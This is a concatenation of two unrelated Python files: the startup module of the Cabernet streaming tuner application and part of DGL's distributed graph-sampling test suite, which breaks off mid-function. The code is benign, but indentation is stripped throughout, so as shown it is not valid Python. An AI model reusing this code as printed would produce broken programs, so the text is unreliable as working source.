from multiprocessing import Queue, Process
import lib.clients.hdhr.hdhr_server as hdhr_server
import lib.clients.web_tuner as web_tuner
import lib.clients.web_admin as web_admin
import lib.common.utils as utils
import lib.plugins.plugin_handler as plugin_handler
import lib.clients.ssdp.ssdp_server as ssdp_server
import lib.db.datamgmt.backups as backups
from lib.db.db_scheduler import DBScheduler
from lib.common.utils import clean_exit
from lib.common.pickling import Pickling
from lib.schedule.scheduler import Scheduler
from lib.common.decorators import getrequest
from lib.web.pages.templates import web_templates
try:
import pip
except ModuleNotFoundError:
print('Unable to load pip module to install modules')
try:
import cryptography
except ImportError:
# pip.main(['install', 'cryptography'])
print('Unable to load cryptography module, will not encrypt passwords')
import lib.config.user_config as user_config
RESTART_REQUESTED = None
if sys.version_info.major == 2 or sys.version_info < (3, 7):
print('Error: cabernet requires python 3.7+.')
sys.exit(1)
def get_args():
parser = argparse.ArgumentParser(description='Fetch online streams', epilog='')
parser.add_argument('-c', '--config_file', dest='cfg', type=str, default=None, help='config.ini location')
parser.add_argument('-r', '--restart', help='Restart process')
return parser.parse_args()
def restart_cabernet(_plugins):
global RESTART_REQUESTED
RESTART_REQUESTED = True
while RESTART_REQUESTED:
time.sleep(0.10)
@getrequest.route('/pages/restart')
def restart_api(_webserver):
scheduler_db = DBScheduler(_webserver.config)
tasks = scheduler_db.get_tasks('Applications', 'Restart')
if len(tasks) == 1:
_webserver.sched_queue.put({'cmd': 'runtask', 'taskid': tasks[0]['taskid'] })
_webserver.do_mime_response(200, 'text/html', 'Restarting Cabernet')
else:
_webserver.do_mime_response(404, 'text/html', web_templates['htmlError'].format('404 - Request Not Found'))
def main(script_dir):
""" main startup method for app """
global RESTART_REQUESTED
hdhr_serverx = None
ssdp_serverx = None
webadmin = None
tuner = None
# Gather args
args = get_args()
if args.restart:
time.sleep(0.01)
# Get Operating system
opersystem = platform.system()
config_obj = None
try:
RESTART_REQUESTED = False
config_obj = user_config.get_config(script_dir, opersystem, args)
config = config_obj.data
logger = logging.getLogger(__name__)
logger.warning('#########################################')
logger.warning('MIT License, Copyright (C) 2021 ROCKY4546')
logger.info('Initiating Cabernet v{}'.format(utils.get_version_str()))
utils.cleanup_web_temp(config)
logger.info('Getting Plugins...')
plugins = plugin_handler.PluginHandler(config_obj)
plugins.initialize_plugins()
config_obj.defn_json = None
scheduler_db = DBScheduler(config)
scheduler_db.save_task(
'Applications',
'Restart',
'internal',
None,
'lib.main.restart_cabernet',
20,
'inline',
'Restarts Cabernet'
)
if opersystem in ['Windows']:
pickle_it = Pickling(config)
pickle_it.to_pickle(plugins)
backups.scheduler_tasks(config)
hdhr_queue = Queue()
sched_queue = Queue()
logger.info('Starting admin website on {}:{}'.format(
config['web']['plex_accessible_ip'],
config['web']['web_admin_port']))
webadmin = Process(target=web_admin.start, args=(plugins, hdhr_queue, sched_queue))
webadmin.start()
time.sleep(0.1)
logger.info('Starting streaming tuner website on {}:{}'.format(
config['web']['plex_accessible_ip'],
config['web']['plex_accessible_port']))
tuner = Process(target=web_tuner.start, args=(plugins, hdhr_queue,))
tuner.start()
time.sleep(0.1)
scheduler = Scheduler(plugins, sched_queue)
time.sleep(0.1)
if not config['ssdp']['disable_ssdp']:
logger.info('Starting SSDP service on port 1900')
ssdp_serverx = Process(target=ssdp_server.ssdp_process, args=(config,))
ssdp_serverx.daemon = True
ssdp_serverx.start()
if not config['hdhomerun']['disable_hdhr']:
logger.info('Starting HDHR service on port 65001')
hdhr_serverx = Process(target=hdhr_server.hdhr_process, args=(config, hdhr_queue,))
hdhr_serverx.start()
time.sleep(0.1)
if opersystem in ['Windows']:
time.sleep(2)
pickle_it.delete_pickle(plugins.__class__.__name__)
logger.info('Cabernet is now online.')
RESTART_REQUESTED = False
while not RESTART_REQUESTED:
time.sleep(5)
RESTART_REQUESTED = False
logger.info('Shutting Down...')
time.sleep(1)
terminate_processes(config, hdhr_serverx, ssdp_serverx, webadmin, tuner, scheduler, config_obj)
except KeyboardInterrupt:
logger.info('^C received, shutting down the server')
shutdown(config, hdhr_serverx, ssdp_serverx, webadmin, tuner, scheduler, config_obj)
def shutdown(_config, _hdhr_serverx, _ssdp_serverx, _webadmin, _tuner, _scheduler, _config_obj):
terminate_processes(_config, _hdhr_serverx, _ssdp_serverx, _webadmin, _tuner, _scheduler, _config_obj)
clean_exit()
def terminate_processes(_config, _hdhr_serverx, _ssdp_serverx, _webadmin, _tuner, _scheduler, _config_obj):
if not _config['hdhomerun']['disable_hdhr'] and _hdhr_serverx:
_hdhr_serverx.terminate()
_hdhr_serverx.join()
del _hdhr_serverx
if not _config['ssdp']['disable_ssdp'] and _ssdp_serverx:
_ssdp_serverx.terminate()
_ssdp_serverx.join()
del _ssdp_serverx
if _scheduler:
_scheduler.terminate()
del _scheduler
if _webadmin:
_webadmin.terminate()
_webadmin.join()
del _webadmin
if _tuner:
_tuner.terminate()
_tuner.join()
del _tuner
if _config_obj and _config_obj.defn_json:
_config_obj.defn_json.terminate()
del _config_obj
|
test_distributed_sampling.py
|
import dgl
import unittest
import os
from dgl.data import CitationGraphDataset
from dgl.data import WN18Dataset
from dgl.distributed import sample_neighbors, sample_etype_neighbors
from dgl.distributed import partition_graph, load_partition, load_partition_book
import sys
import multiprocessing as mp
import numpy as np
import backend as F
import time
from utils import generate_ip_config, reset_envs
from pathlib import Path
import pytest
from scipy import sparse as spsp
import random
from dgl.distributed import DistGraphServer, DistGraph
def start_server(rank, tmpdir, disable_shared_mem, graph_name, graph_format=['csc', 'coo']):
g = DistGraphServer(rank, "rpc_ip_config.txt", 1, 1,
tmpdir / (graph_name + '.json'), disable_shared_mem=disable_shared_mem,
graph_format=graph_format)
g.start()
def start_sample_client(rank, tmpdir, disable_shared_mem):
gpb = None
if disable_shared_mem:
_, _, _, gpb, _, _, _ = load_partition(tmpdir / 'test_sampling.json', rank)
dgl.distributed.initialize("rpc_ip_config.txt")
dist_graph = DistGraph("test_sampling", gpb=gpb)
try:
sampled_graph = sample_neighbors(dist_graph, [0, 10, 99, 66, 1024, 2008], 3)
except Exception as e:
print(e)
sampled_graph = None
dgl.distributed.exit_client()
return sampled_graph
def start_find_edges_client(rank, tmpdir, disable_shared_mem, eids, etype=None):
gpb = None
if disable_shared_mem:
_, _, _, gpb, _, _, _ = load_partition(tmpdir / 'test_find_edges.json', rank)
dgl.distributed.initialize("rpc_ip_config.txt")
dist_graph = DistGraph("test_find_edges", gpb=gpb)
try:
u, v = dist_graph.find_edges(eids, etype=etype)
except Exception as e:
print(e)
u, v = None, None
dgl.distributed.exit_client()
return u, v
def start_get_degrees_client(rank, tmpdir, disable_shared_mem, nids=None):
gpb = None
if disable_shared_mem:
_, _, _, gpb, _, _, _ = load_partition(tmpdir / 'test_get_degrees.json', rank)
dgl.distributed.initialize("rpc_ip_config.txt", 1)
dist_graph = DistGraph("test_get_degrees", gpb=gpb)
try:
in_deg = dist_graph.in_degrees(nids)
all_in_deg = dist_graph.in_degrees()
out_deg = dist_graph.out_degrees(nids)
all_out_deg = dist_graph.out_degrees()
except Exception as e:
print(e)
in_deg, out_deg, all_in_deg, all_out_deg = None, None, None, None
dgl.distributed.exit_client()
return in_deg, out_deg, all_in_deg, all_out_deg
def check_rpc_sampling(tmpdir, num_server):
generate_ip_config("rpc_ip_config.txt", num_server, num_server)
g = CitationGraphDataset("cora")[0]
g.readonly()
print(g.idtype)
num_parts = num_server
num_hops = 1
partition_graph(g, 'test_sampling', num_parts, tmpdir,
num_hops=num_hops, part_method='metis', reshuffle=False)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1, 'test_sampling'))
p.start()
time.sleep(1)
pserver_list.append(p)
sampled_graph = start_sample_client(0, tmpdir, num_server > 1)
print("Done sampling")
for p in pserver_list:
p.join()
src, dst = sampled_graph.edges()
assert sampled_graph.number_of_nodes() == g.number_of_nodes()
assert np.all(F.asnumpy(g.has_edges_between(src, dst)))
eids = g.edge_ids(src, dst)
assert np.array_equal(
F.asnumpy(sampled_graph.edata[dgl.EID]), F.asnumpy(eids))
def check_rpc_find_edges_shuffle(tmpdir, num_server):
generate_ip_config("rpc_ip_config.txt", num_server, num_server)
g = CitationGraphDataset("cora")[0]
g.readonly()
num_parts = num_server
orig_nid, orig_eid = partition_graph(g, 'test_find_edges', num_parts, tmpdir,
num_hops=1, part_method='metis',
reshuffle=True, return_mapping=True)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1,
'test_find_edges', ['csr', 'coo']))
p.start()
time.sleep(1)
pserver_list.append(p)
eids = F.tensor(np.random.randint(g.number_of_edges(), size=100))
u, v = g.find_edges(orig_eid[eids])
du, dv = start_find_edges_client(0, tmpdir, num_server > 1, eids)
du = orig_nid[du]
dv = orig_nid[dv]
assert F.array_equal(u, du)
assert F.array_equal(v, dv)
def create_random_hetero(dense=False, empty=False):
num_nodes = {'n1': 210, 'n2': 200, 'n3': 220} if dense else \
{'n1': 1010, 'n2': 1000, 'n3': 1020}
etypes = [('n1', 'r1', 'n2'),
('n1', 'r2', 'n3'),
('n2', 'r3', 'n3')]
edges = {}
random.seed(42)
for etype in etypes:
src_ntype, _, dst_ntype = etype
arr = spsp.random(num_nodes[src_ntype] - 10 if empty else num_nodes[src_ntype],
num_nodes[dst_ntype] - 10 if empty else num_nodes[dst_ntype],
density=0.1 if dense else 0.001,
format='coo', random_state=100)
edges[etype] = (arr.row, arr.col)
g = dgl.heterograph(edges, num_nodes)
g.nodes['n1'].data['feat'] = F.ones((g.number_of_nodes('n1'), 10), F.float32, F.cpu())
return g
def check_rpc_hetero_find_edges_shuffle(tmpdir, num_server):
generate_ip_config("rpc_ip_config.txt", num_server, num_server)
g = create_random_hetero()
num_parts = num_server
orig_nid, orig_eid = partition_graph(g, 'test_find_edges', num_parts, tmpdir,
num_hops=1, part_method='metis',
reshuffle=True, return_mapping=True)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1,
'test_find_edges', ['csr', 'coo']))
p.start()
time.sleep(1)
pserver_list.append(p)
eids = F.tensor(np.random.randint(g.number_of_edges('r1'), size=100))
u, v = g.find_edges(orig_eid['r1'][eids], etype='r1')
du, dv = start_find_edges_client(0, tmpdir, num_server > 1, eids, etype='r1')
du = orig_nid['n1'][du]
dv = orig_nid['n2'][dv]
assert F.array_equal(u, du)
assert F.array_equal(v, dv)
# Wait non shared memory graph store
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
@unittest.skipIf(dgl.backend.backend_name == 'tensorflow', reason='Not support tensorflow for now')
@unittest.skipIf(dgl.backend.backend_name == "mxnet", reason="Turn off Mxnet support")
@pytest.mark.parametrize("num_server", [1, 2])
def test_rpc_find_edges_shuffle(num_server):
reset_envs()
import tempfile
os.environ['DGL_DIST_MODE'] = 'distributed'
with tempfile.TemporaryDirectory() as tmpdirname:
check_rpc_hetero_find_edges_shuffle(Path(tmpdirname), num_server)
check_rpc_find_edges_shuffle(Path(tmpdirname), num_server)
def check_rpc_get_degree_shuffle(tmpdir, num_server):
generate_ip_config("rpc_ip_config.txt", num_server, num_server)
g = CitationGraphDataset("cora")[0]
g.readonly()
num_parts = num_server
partition_graph(g, 'test_get_degrees', num_parts, tmpdir,
num_hops=1, part_method='metis', reshuffle=True)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1, 'test_get_degrees'))
p.start()
time.sleep(1)
pserver_list.append(p)
orig_nid = F.zeros((g.number_of_nodes(),), dtype=F.int64, ctx=F.cpu())
for i in range(num_server):
part, _, _, _, _, _, _ = load_partition(tmpdir / 'test_get_degrees.json', i)
orig_nid[part.ndata[dgl.NID]] = part.ndata['orig_id']
nids = F.tensor(np.random.randint(g.number_of_nodes(), size=100))
in_degs, out_degs, all_in_degs, all_out_degs = start_get_degrees_client(0, tmpdir, num_server > 1, nids)
print("Done get_degree")
for p in pserver_list:
p.join()
print('check results')
assert F.array_equal(g.in_degrees(orig_nid[nids]), in_degs)
assert F.array_equal(g.in_degrees(orig_nid), all_in_degs)
assert F.array_equal(g.out_degrees(orig_nid[nids]), out_degs)
assert F.array_equal(g.out_degrees(orig_nid), all_out_degs)
# Wait non shared memory graph store
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
@unittest.skipIf(dgl.backend.backend_name == 'tensorflow', reason='Not support tensorflow for now')
@unittest.skipIf(dgl.backend.backend_name == "mxnet", reason="Turn off Mxnet support")
@pytest.mark.parametrize("num_server", [1, 2])
def test_rpc_get_degree_shuffle(num_server):
reset_envs()
import tempfile
os.environ['DGL_DIST_MODE'] = 'distributed'
with tempfile.TemporaryDirectory() as tmpdirname:
check_rpc_get_degree_shuffle(Path(tmpdirname), num_server)
#@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
#@unittest.skipIf(dgl.backend.backend_name == 'tensorflow', reason='Not support tensorflow for now')
@unittest.skip('Only support partition with shuffle')
def test_rpc_sampling():
reset_envs()
import tempfile
os.environ['DGL_DIST_MODE'] = 'distributed'
with tempfile.TemporaryDirectory() as tmpdirname:
check_rpc_sampling(Path(tmpdirname), 2)
def check_rpc_sampling_shuffle(tmpdir, num_server):
generate_ip_config("rpc_ip_config.txt", num_server, num_server)
g = CitationGraphDataset("cora")[0]
g.readonly()
num_parts = num_server
num_hops = 1
partition_graph(g, 'test_sampling', num_parts, tmpdir,
num_hops=num_hops, part_method='metis', reshuffle=True)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1, 'test_sampling'))
p.start()
time.sleep(1)
pserver_list.append(p)
sampled_graph = start_sample_client(0, tmpdir, num_server > 1)
print("Done sampling")
for p in pserver_list:
p.join()
orig_nid = F.zeros((g.number_of_nodes(),), dtype=F.int64, ctx=F.cpu())
orig_eid = F.zeros((g.number_of_edges(),), dtype=F.int64, ctx=F.cpu())
for i in range(num_server):
part, _, _, _, _, _, _ = load_partition(tmpdir / 'test_sampling.json', i)
orig_nid[part.ndata[dgl.NID]] = part.ndata['orig_id']
orig_eid[part.edata[dgl.EID]] = part.edata['orig_id']
src, dst = sampled_graph.edges()
src = orig_nid[src]
dst = orig_nid[dst]
assert sampled_graph.number_of_nodes() == g.number_of_nodes()
assert np.all(F.asnumpy(g.has_edges_between(src, dst)))
eids = g.edge_ids(src, dst)
eids1 = orig_eid[sampled_graph.edata[dgl.EID]]
assert np.array_equal(F.asnumpy(eids1), F.asnumpy(eids))
def start_hetero_sample_client(rank, tmpdir, disable_shared_mem, nodes):
gpb = None
if disable_shared_mem:
_, _, _, gpb, _, _, _ = load_partition(tmpdir / 'test_sampling.json', rank)
dgl.distributed.initialize("rpc_ip_config.txt")
dist_graph = DistGraph("test_sampling", gpb=gpb)
assert 'feat' in dist_graph.nodes['n1'].data
assert 'feat' not in dist_graph.nodes['n2'].data
assert 'feat' not in dist_graph.nodes['n3'].data
if gpb is None:
gpb = dist_graph.get_partition_book()
try:
sampled_graph = sample_neighbors(dist_graph, nodes, 3)
block = dgl.to_block(sampled_graph, nodes)
block.edata[dgl.EID] = sampled_graph.edata[dgl.EID]
except Exception as e:
print(e)
block = None
dgl.distributed.exit_client()
return block, gpb
def start_hetero_etype_sample_client(rank, tmpdir, disable_shared_mem, fanout=3,
nodes={'n3': [0, 10, 99, 66, 124, 208]}):
gpb = None
if disable_shared_mem:
_, _, _, gpb, _, _, _ = load_partition(tmpdir / 'test_sampling.json', rank)
dgl.distributed.initialize("rpc_ip_config.txt")
dist_graph = DistGraph("test_sampling", gpb=gpb)
assert 'feat' in dist_graph.nodes['n1'].data
assert 'feat' not in dist_graph.nodes['n2'].data
assert 'feat' not in dist_graph.nodes['n3'].data
if dist_graph.local_partition is not None:
# Check whether etypes are sorted in dist_graph
local_g = dist_graph.local_partition
local_nids = np.arange(local_g.num_nodes())
for lnid in local_nids:
leids = local_g.in_edges(lnid, form='eid')
letids = F.asnumpy(local_g.edata[dgl.ETYPE][leids])
_, idices = np.unique(letids, return_index=True)
assert np.all(idices[:-1] <= idices[1:])
if gpb is None:
gpb = dist_graph.get_partition_book()
try:
sampled_graph = sample_etype_neighbors(dist_graph, nodes, dgl.ETYPE, fanout)
block = dgl.to_block(sampled_graph, nodes)
block.edata[dgl.EID] = sampled_graph.edata[dgl.EID]
except Exception as e:
print(e)
block = None
dgl.distributed.exit_client()
return block, gpb
def check_rpc_hetero_sampling_shuffle(tmpdir, num_server):
generate_ip_config("rpc_ip_config.txt", num_server, num_server)
g = create_random_hetero()
num_parts = num_server
num_hops = 1
partition_graph(g, 'test_sampling', num_parts, tmpdir,
num_hops=num_hops, part_method='metis', reshuffle=True)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1, 'test_sampling'))
p.start()
time.sleep(1)
pserver_list.append(p)
block, gpb = start_hetero_sample_client(0, tmpdir, num_server > 1,
nodes = {'n3': [0, 10, 99, 66, 124, 208]})
print("Done sampling")
for p in pserver_list:
p.join()
orig_nid_map = {ntype: F.zeros((g.number_of_nodes(ntype),), dtype=F.int64) for ntype in g.ntypes}
orig_eid_map = {etype: F.zeros((g.number_of_edges(etype),), dtype=F.int64) for etype in g.etypes}
for i in range(num_server):
part, _, _, _, _, _, _ = load_partition(tmpdir / 'test_sampling.json', i)
ntype_ids, type_nids = gpb.map_to_per_ntype(part.ndata[dgl.NID])
for ntype_id, ntype in enumerate(g.ntypes):
idx = ntype_ids == ntype_id
F.scatter_row_inplace(orig_nid_map[ntype], F.boolean_mask(type_nids, idx),
F.boolean_mask(part.ndata['orig_id'], idx))
etype_ids, type_eids = gpb.map_to_per_etype(part.edata[dgl.EID])
for etype_id, etype in enumerate(g.etypes):
idx = etype_ids == etype_id
F.scatter_row_inplace(orig_eid_map[etype], F.boolean_mask(type_eids, idx),
F.boolean_mask(part.edata['orig_id'], idx))
for src_type, etype, dst_type in block.canonical_etypes:
src, dst = block.edges(etype=etype)
# These are global Ids after shuffling.
shuffled_src = F.gather_row(block.srcnodes[src_type].data[dgl.NID], src)
shuffled_dst = F.gather_row(block.dstnodes[dst_type].data[dgl.NID], dst)
shuffled_eid = block.edges[etype].data[dgl.EID]
orig_src = F.asnumpy(F.gather_row(orig_nid_map[src_type], shuffled_src))
orig_dst = F.asnumpy(F.gather_row(orig_nid_map[dst_type], shuffled_dst))
orig_eid = F.asnumpy(F.gather_row(orig_eid_map[etype], shuffled_eid))
# Check the node Ids and edge Ids.
orig_src1, orig_dst1 = g.find_edges(orig_eid, etype=etype)
assert np.all(F.asnumpy(orig_src1) == orig_src)
assert np.all(F.asnumpy(orig_dst1) == orig_dst)
def get_degrees(g, nids, ntype):
deg = F.zeros((len(nids),), dtype=F.int64)
for srctype, etype, dsttype in g.canonical_etypes:
if srctype == ntype:
deg += g.out_degrees(u=nids, etype=etype)
elif dsttype == ntype:
deg += g.in_degrees(v=nids, etype=etype)
return deg
def check_rpc_hetero_sampling_empty_shuffle(tmpdir, num_server):
generate_ip_config("rpc_ip_config.txt", num_server, num_server)
g = create_random_hetero(empty=True)
num_parts = num_server
num_hops = 1
orig_nids, _ = partition_graph(g, 'test_sampling', num_parts, tmpdir,
num_hops=num_hops, part_method='metis',
reshuffle=True, return_mapping=True)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1, 'test_sampling'))
p.start()
time.sleep(1)
pserver_list.append(p)
deg = get_degrees(g, orig_nids['n3'], 'n3')
empty_nids = F.nonzero_1d(deg == 0)
block, gpb = start_hetero_sample_client(0, tmpdir, num_server > 1,
nodes = {'n3': empty_nids})
print("Done sampling")
for p in pserver_list:
p.join()
assert block.number_of_edges() == 0
assert len(block.etypes) == len(g.etypes)
def check_rpc_hetero_etype_sampling_shuffle(tmpdir, num_server):
generate_ip_config("rpc_ip_config.txt", num_server, num_server)
g = create_random_hetero(dense=True)
num_parts = num_server
num_hops = 1
partition_graph(g, 'test_sampling', num_parts, tmpdir,
num_hops=num_hops, part_method='metis', reshuffle=True)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1, 'test_sampling'))
p.start()
time.sleep(1)
pserver_list.append(p)
fanout = 3
block, gpb = start_hetero_etype_sample_client(0, tmpdir, num_server > 1, fanout,
nodes={'n3': [0, 10, 99, 66, 124, 208]})
print("Done sampling")
for p in pserver_list:
p.join()
src, dst = block.edges(etype=('n1', 'r2', 'n3'))
assert len(src) == 18
src, dst = block.edges(etype=('n2', 'r3', 'n3'))
assert len(src) == 18
orig_nid_map = {ntype: F.zeros((g.number_of_nodes(ntype),), dtype=F.int64) for ntype in g.ntypes}
orig_eid_map = {etype: F.zeros((g.number_of_edges(etype),), dtype=F.int64) for etype in g.etypes}
for i in range(num_server):
part, _, _, _, _, _, _ = load_partition(tmpdir / 'test_sampling.json', i)
ntype_ids, type_nids = gpb.map_to_per_ntype(part.ndata[dgl.NID])
for ntype_id, ntype in enumerate(g.ntypes):
idx = ntype_ids == ntype_id
F.scatter_row_inplace(orig_nid_map[ntype], F.boolean_mask(type_nids, idx),
F.boolean_mask(part.ndata['orig_id'], idx))
etype_ids, type_eids = gpb.map_to_per_etype(part.edata[dgl.EID])
for etype_id, etype in enumerate(g.etypes):
idx = etype_ids == etype_id
F.scatter_row_inplace(orig_eid_map[etype], F.boolean_mask(type_eids, idx),
F.boolean_mask(part.edata['orig_id'], idx))
for src_type, etype, dst_type in block.canonical_etypes:
src, dst = block.edges(etype=etype)
# These are global Ids after shuffling.
shuffled_src = F.gather_row(block.srcnodes[src_type].data[dgl.NID], src)
shuffled_dst = F.gather_row(block.dstnodes[dst_type].data[dgl.NID], dst)
shuffled_eid = block.edges[etype].data[dgl.EID]
orig_src = F.asnumpy(F.gather_row(orig_nid_map[src_type], shuffled_src))
orig_dst = F.asnumpy(F.gather_row(orig_nid_map[dst_type], shuffled_dst))
orig_eid = F.asnumpy(F.gather_row(orig_eid_map[etype], shuffled_eid))
# Check the node Ids and edge Ids.
orig_src1, orig_dst1 = g.find_edges(orig_eid, etype=etype)
assert np.all(F.asnumpy(orig_src1) == orig_src)
assert np.all(F.asnumpy(orig_dst1) == orig_dst)
def check_rpc_hetero_etype_sampling_empty_shuffle(tmpdir, num_server):
generate_ip_config("rpc_ip_config.txt", num_server, num_server)
g = create_random_hetero(dense=True, empty=True)
num_parts = num_server
num_hops = 1
orig_nids, _ = partition_graph(g, 'test_sampling', num_parts, tmpdir,
num_hops=num_hops, part_method='metis',
reshuffle=True, return_mapping=True)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1, 'test_sampling'))
p.start()
time.sleep(1)
pserver_list.append(p)
fanout = 3
deg = get_degrees(g, orig_nids['n3'], 'n3')
empty_nids = F.nonzero_1d(deg == 0)
block, gpb = start_hetero_etype_sample_client(0, tmpdir, num_server > 1, fanout,
nodes={'n3': empty_nids})
print("Done sampling")
for p in pserver_list:
p.join()
assert block.number_of_edges() == 0
assert len(block.etypes) == len(g.etypes)
# Wait non shared memory graph store
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
@unittest.skipIf(dgl.backend.backend_name == 'tensorflow', reason='Not support tensorflow for now')
@unittest.skipIf(dgl.backend.backend_name == "mxnet", reason="Turn off Mxnet support")
@pytest.mark.parametrize("num_server", [1, 2])
def test_rpc_sampling_shuffle(num_server):
reset_envs()
import tempfile
os.environ['DGL_DIST_MODE'] = 'distributed'
with tempfile.TemporaryDirectory() as tmpdirname:
check_rpc_sampling_shuffle(Path(tmpdirname), num_server)
check_rpc_hetero_sampling_shuffle(Path(tmpdirname), num_server)
check_rpc_hetero_sampling_empty_shuffle(Path(tmpdirname), num_server)
check_rpc_hetero_etype_sampling_shuffle(Path(tmpdirname), num_server)
check_rpc_hetero_etype_sampling_empty_shuffle(Path(tmpdirname), num_server)
def check_standalone_sampling(tmpdir, reshuffle):
g = CitationGraphDataset("cora")[0]
num_parts = 1
num_hops = 1
partition_graph(g, 'test_sampling', num_parts, tmpdir,
num_hops=num_hops, part_method='metis', reshuffle=reshuffle)
os.environ['DGL_DIST_MODE'] = 'standalone'
dgl.distributed.initialize("rpc_ip_config.txt")
dist_graph = DistGraph("test_sampling", part_config=tmpdir / 'test_sampling.json')
sampled_graph = sample_neighbors(dist_graph, [0, 10, 99, 66, 1024, 2008], 3)
src, dst = sampled_graph.edges()
assert sampled_graph.number_of_nodes() == g.number_of_nodes()
assert np.all(F.asnumpy(g.has_edges_between(src, dst)))
eids = g.edge_ids(src, dst)
assert np.array_equal(
F.asnumpy(sampled_graph.edata[dgl.EID]), F.asnumpy(eids))
dgl.distributed.exit_client()
def check_standalone_etype_sampling(tmpdir, reshuffle):
hg = CitationGraphDataset('cora')[0]
num_parts = 1
num_hops = 1
partition_graph(hg, 'test_sampling', num_parts, tmpdir,
num_hops=num_hops, part_method='metis', reshuffle=reshuffle)
os.environ['DGL_DIST_MODE'] = 'standalone'
dgl.distributed.initialize("rpc_ip_config.txt")
dist_graph = DistGraph("test_sampling", part_config=tmpdir / 'test_sampling.json')
sampled_graph = sample_etype_neighbors(dist_graph, [0, 10, 99, 66, 1023], dgl.ETYPE, 3)
src, dst = sampled_graph.edges()
assert sampled_graph.number_of_nodes() == hg.number_of_nodes()
assert np.all(F.asnumpy(hg.has_edges_between(src, dst)))
eids = hg.edge_ids(src, dst)
assert np.array_equal(
F.asnumpy(sampled_graph.edata[dgl.EID]), F.asnumpy(eids))
dgl.distributed.exit_client()
def check_standalone_etype_sampling_heterograph(tmpdir, reshuffle):
hg = CitationGraphDataset('cora')[0]
num_parts = 1
num_hops = 1
src, dst = hg.edges()
new_hg = dgl.heterograph({('paper', 'cite', 'paper'): (src, dst),
('paper', 'cite-by', 'paper'): (dst, src)},
{'paper': hg.number_of_nodes()})
partition_graph(new_hg, 'test_hetero_sampling', num_parts, tmpdir,
num_hops=num_hops, part_method='metis', reshuffle=reshuffle)
os.environ['DGL_DIST_MODE'] = 'standalone'
dgl.distributed.initialize("rpc_ip_config.txt")
dist_graph = DistGraph("test_hetero_sampling", part_config=tmpdir / 'test_hetero_sampling.json')
sampled_graph = sample_etype_neighbors(dist_graph, [0, 1, 2, 10, 99, 66, 1023, 1024, 2700, 2701], dgl.ETYPE, 1)
src, dst = sampled_graph.edges(etype=('paper', 'cite', 'paper'))
assert len(src) == 10
src, dst = sampled_graph.edges(etype=('paper', 'cite-by', 'paper'))
assert len(src) == 10
assert sampled_graph.number_of_nodes() == new_hg.number_of_nodes()
dgl.distributed.exit_client()
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
@unittest.skipIf(dgl.backend.backend_name == 'tensorflow', reason='Not support tensorflow for now')
def test_standalone_sampling():
reset_envs()
import tempfile
os.environ['DGL_DIST_MODE'] = 'standalone'
with tempfile.TemporaryDirectory() as tmpdirname:
check_standalone_sampling(Path(tmpdirname), False)
check_standalone_sampling(Path(tmpdirname), True)
def start_in_subgraph_client(rank, tmpdir, disable_shared_mem, nodes):
gpb = None
dgl.distributed.initialize("rpc_ip_config.txt")
if disable_shared_mem:
_, _, _, gpb, _, _, _ = load_partition(tmpdir / 'test_in_subgraph.json', rank)
dist_graph = DistGraph("test_in_subgraph", gpb=gpb)
try:
sampled_graph = dgl.distributed.in_subgraph(dist_graph, nodes)
except Exception as e:
print(e)
sampled_graph = None
dgl.distributed.exit_client()
return sampled_graph
def check_rpc_in_subgraph_shuffle(tmpdir, num_server):
generate_ip_config("rpc_ip_config.txt", num_server, num_server)
g = CitationGraphDataset("cora")[0]
g.readonly()
num_parts = num_server
partition_graph(g, 'test_in_subgraph', num_parts, tmpdir,
num_hops=1, part_method='metis', reshuffle=True)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1, 'test_in_subgraph'))
p.start()
time.sleep(1)
pserver_list.append(p)
nodes = [0, 10, 99, 66, 1024, 2008]
sampled_graph = start_in_subgraph_client(0, tmpdir, num_server > 1, nodes)
for p in pserver_list:
p.join()
orig_nid = F.zeros((g.number_of_nodes(),), dtype=F.int64, ctx=F.cpu())
orig_eid = F.zeros((g.number_of_edges(),), dtype=F.int64, ctx=F.cpu())
for i in range(num_server):
part, _, _, _, _, _, _ = load_partition(tmpdir / 'test_in_subgraph.json', i)
orig_nid[part.ndata[dgl.NID]] = part.ndata['orig_id']
orig_eid[part.edata[dgl.EID]] = part.edata['orig_id']
src, dst = sampled_graph.edges()
src = orig_nid[src]
dst = orig_nid[dst]
assert sampled_graph.number_of_nodes() == g.number_of_nodes()
assert np.all(F.asnumpy(g.has_edges_between(src, dst)))
subg1 = dgl.in_subgraph(g, orig_nid[nodes])
src1, dst1 = subg1.edges()
assert np.all(np.sort(F.asnumpy(src)) == np.sort(F.asnumpy(src1)))
assert np.all(np.sort(F.asnumpy(dst)) == np.sort(F.asnumpy(dst1)))
eids = g.edge_ids(src, dst)
eids1 = orig_eid[sampled_graph.edata[dgl.EID]]
assert np.array_equal(F.asnumpy(eids1), F.asnumpy(eids))
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
@unittest.skipIf(dgl.backend.backend_name == 'tensorflow', reason='Not support tensorflow for now')
def test_rpc_in_subgraph():
reset_envs()
import tempfile
os.environ['DGL_DIST_MODE'] = 'distributed'
